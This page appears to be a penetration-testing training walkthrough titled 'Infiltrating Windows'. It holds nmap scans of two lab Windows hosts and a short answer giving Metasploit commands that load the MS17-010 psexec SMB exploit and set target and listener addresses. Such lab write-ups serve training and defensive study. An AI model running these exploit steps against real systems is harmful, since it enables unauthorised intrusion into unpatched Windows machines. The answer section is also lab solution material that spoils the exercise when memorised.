Infiltrating Windows

April 28, 2024

# Nmap 7.94 scan initiated Sat Apr 27 23:41:51 2024 as: nmap -sC -sV -oN nmap -vv 10.129.68.35
Increasing send delay for 10.129.68.35 from 0 to 5 due to 62 out of 206 dropped probes since last increase.
Increasing send delay for 10.129.68.35 from 5 to 10 due to 11 out of 13 dropped probes since last increase.
Increasing send delay for 10.129.68.35 from 10 to 20 due to 13 out of 41 dropped probes since last increase.
Nmap scan report for 10.129.68.35
Host is up, received syn-ack (0.34s latency).
Scanned at 2024-04-27 23:41:51 PST for 400s
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE SERVICE     REASON  VERSION
7/tcp    open  echo        syn-ack
9/tcp    open  discard?    syn-ack
13/tcp   open  daytime     syn-ack Microsoft Windows USA daytime
17/tcp   open  qotd        syn-ack Windows qotd (English)
19/tcp   open  chargen     syn-ack
80/tcp   open  http        syn-ack Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc       syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp  open  microsof@  syn-ack Windows 10 Pro 18363 microsoft-ds (workgroup: WORKGROUP)
2179/tcp open  vmrdp?      syn-ack
Service Info: Host: SHELLS-WIN10; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 57959/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 50733/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 25647/udp): CLEAN (Failed to receive data)
|   Check 4 (port 20860/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 2h20m05s, deviation: 4h02m30s, median: 4s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-04-27T15:48:07
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 10 Pro 18363 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Shells-Win10
|   NetBIOS computer name: SHELLS-WIN10\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-04-27T08:48:08-07:00

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 27 23:48:31 2024 -- 1 IP address (1 host up) scanned in 400.77 seconds

# Nmap 7.94 scan initiated Mon Apr 29 22:08:21 2024 as: nmap -sV -O -oN nmap-os -vv 10.129.201.97
Nmap scan report for 10.129.201.97
Host is up, received echo-reply ttl 127 (0.30s latency).
Scanned at 2024-04-29 22:08:21 PST for 32s
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE      REASON          VERSION
80/tcp  open  http         syn-ack ttl 127 Microsoft IIS httpd 10.0
135/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=4/29%OT=80%CT=1%CU=30926%PV=Y%DS=2%DC=I%G=Y%TM=662FA9F
OS:5%P=x86_64-pc-linux-gnu)SEQ(CI=I)SEQ(SP=103%GCD=1%ISR=10D%TI=I%CI=I%TS=A
OS:)SEQ(SP=103%GCD=1%ISR=10D%TI=I%CI=RD%TS=A)SEQ(SP=104%GCD=1%ISR=10C%TI=I%
OS:CI=I%II=I%SS=S%TS=A)OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4
OS:=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)WIN(W1=2000%W2=2000%W3=2000%W4=2
OS:000%W5=2000%W6=2000)ECN(R=N)ECN(R=Y%DF=Y%T=80%W=2000%O=M53CNW8NNS%CC=Y%Q
OS:=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=
OS:AR%O=%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T
OS:=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0
OS:%Q=)T4(R=Y%DF=Y%T=80%W=0%S=O%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z
OS:%A=O%F=AR%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=
OS:Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=O%A=O%F=R%
OS:O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=
OS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)IE(R=Y%DFI=N%T=80%CD=Z)

Uptime guess: 0.003 days (since Mon Apr 29 22:04:08 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 29 22:08:53 2024 -- 1 IP address (1 host up) scanned in 32.20 seconds

HERE IS THE ANSWER

I just have to use the psexec instead of uploading a reverse shell in the web

search eternal
use 1 (exploit(windows/smb/ms17_010_psexec)
options
set rhost 10.129.201.97
set lhost 10.10.15.241

PreviousCrafting Payloads with MSFvenom NextInfiltrating Unix/Linux

Last updated 1 year ago